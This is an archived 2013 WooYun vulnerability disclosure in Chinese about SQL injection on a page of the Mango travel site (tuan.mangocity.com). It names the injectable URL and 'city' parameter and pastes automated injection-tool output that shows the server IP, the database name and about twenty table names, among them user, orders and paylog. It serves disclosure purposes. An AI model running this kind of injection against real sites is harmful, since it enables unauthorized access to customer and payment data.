乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-09-23: 细节已通知厂商并且等待厂商处理中 2013-09-28: 厂商已经主动忽略漏洞,细节向公众公开
芒果网某处SQL注射漏洞
地址 http://tuan.mangocity.com/product/productList.aspx?city=%e4%b8%89%e4%ba%9a&productCount=1314拿胡萝卜跑的..
Analyzing http://tuan.mangocity.com/product/productList.aspx?city=%e4%b8%89%e4%ba%9a&productCount=1314 with 2 input parameter(s)Test parameter: productCountHost IP: 183.62.144.234Web Server: Microsoft-IIS/6.0Powered-by: ASP.NETUnable to find a suitable keyword. Nevertheless, continuing...Unable to detect server type! But there may still be a chance.Cannot find column count!Testing for MySQL error based injection methodTesting for MsSQL error based injection methodBypassing illegal union failed! Turning off this featureChanging inejction syntaxMsSQL error based injection method cant be used!MsSQL time based injection method can't be usedMySQL time based injection method can't be usedIt seems that input parameter is not effective! Check the following: Are you sure that the input parameter really exists?! Are you sure that the input value '1314' is valid? Are you sure that the 'GET' method is correct?Reanalyzing for string type syntax.Unable to detect server type! But there may still be a chance.Cannot find column count!Testing for MySQL error based injection methodChanging inejction syntaxMsSQL error based injection method cant be used!MsSQL time based injection method can't be usedMySQL time based injection method can't be usedIt seems that input parameter is not effective! Check the following: Are you sure that the input parameter really exists?! Are you sure that the input value '1314' is valid? Are you sure that the 'GET' method is correct?Test parameter: cityKeyword Found: ¥1799DB Server: MySQL >=5Trying another method using keyword for finding columns countFinding columns count for MySQL failed!Current DB: tuanMySQL error based injection method can be used!
Count(table_name) of information_schema.tables where table_schema=0x7475616E is 20Can not get all tables by group_concat!Count(table_name) of information_schema.tables where table_schema=0x7475616E is 20Bypassing illegal union failed! Turning off this featureTable found: cityinfoTable found: ctripproductTable found: hotelTable found: hoteltempTable found: invoiceTable found: orderlogTable found: ordersTable found: paraminfoTable found: paylogTable found: pictureTable found: productTable found: productbakTable found: systemlogTable found: szoneTable found: testTable found: test2Table found: ticketTable found: userTable found: waitsendmsgTable found: xzone
没深入了..
我不懂得..
危害等级:无影响厂商忽略
忽略时间:2013-09-28 10:59
漏洞Rank:5 (WooYun评价)
暂无